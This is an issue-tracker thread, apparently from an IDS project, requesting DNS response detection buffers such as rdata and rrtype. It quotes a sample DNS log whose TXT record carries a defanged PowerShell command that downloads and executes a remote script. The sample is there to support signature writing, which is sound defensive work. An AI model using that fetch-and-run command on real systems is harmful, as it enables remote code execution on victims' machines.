Feature #2448
opendns: additional buffers for DNS Responses
Description
Hi,
It would be nice to be able to include additional buffers for the DNS protocol responses to help write more efficient and effective signatures.
I think buffers for sections like rdata and rrtype should be included to cover things like data in TXT Records, but it could be expanded to cover the other sections of the response.
{
"timestamp":"2018-02-14T19:12:58.760866-0700",
"flow_id":345727363089610,
"pcap_cnt":4,
"event_type":"dns",
"src_ip":"8.8.8.8",
"src_port":53,
"dest_ip":"192.168.0.105",
"dest_port":49153,
"proto":"UDP",
"dns":{
"type":"answer",
"id":2,
"rcode":"NOERROR",
"rrname":"shinobotps1[.]com",
"rrtype":"TXT",
"ttl":3600,
"rdata":"powershell IEX (New-Object Net.WebClient).DownloadString('hxxps:\/\/shinobotps1[.]com\/download_get.php');"
}
}
Thanks!
JI Updated by Jason Ish about 8 years ago
- Related to Feature #2198: Extend the DNS parser to accept dns_response keyword in signatures added
AH Updated by Andreas Herz about 8 years ago
- Assignee set to OISF Dev
- Target version set to TBD
VJ Updated by Victor Julien over 6 years ago
- Target version changed from TBD to 6.0.0beta1
VJ Updated by Victor Julien over 6 years ago
- Label Beginner added
VJ Updated by Victor Julien about 6 years ago
- Label Protocol added
VJ Updated by Victor Julien almost 6 years ago
- Target version changed from 6.0.0beta1 to 7.0.0-beta1
JI Updated by Jason Ish over 5 years ago
- Related to Task #4097: Suricon 2020 brainstorm added
JI Updated by Jason Ish over 5 years ago
As discussed today in the 2020 brainstorm this is still a desired feature. It should be more or less trivial, but could serve as an example of unifying eve logged buffers, and buffers available for detection. At the very least, the rdata buffer should be exposed a sticky for content matches.
VJ Updated by Victor Julien over 4 years ago
- Target version changed from 7.0.0-beta1 to 8.0.0-beta1
BM Updated by Brandon Murphy almost 3 years ago
It would be nice to have all dns flags parsed as well
perhaps like a dns.flags.z, dns.flags.replycode, etc
doing so would avoid the use of byte_test which are often difficult to read for users attempted to understand the logic in a rule.
JI Updated by Jason Ish almost 2 years ago
- Related to Feature #7012: rules: add dns.response sticky buffer added
JI Updated by Jason Ish almost 2 years ago
- Related to Feature #5642: DNS: parity between log fields and detection added
PA Updated by Philippe Antoine about 1 year ago
- Assignee changed from OISF Dev to Jason Ish
I think you are on it Jason, right ?
JI Updated by Jason Ish about 1 year ago
SB Updated by Shivani Bhardwaj about 1 year ago
- Subject changed from Add additional buffers for DNS Responses to dns: additional buffers for DNS Responses
VJ Updated by Victor Julien 11 months ago
- Target version changed from 8.0.0-rc1 to 9.0.0-beta1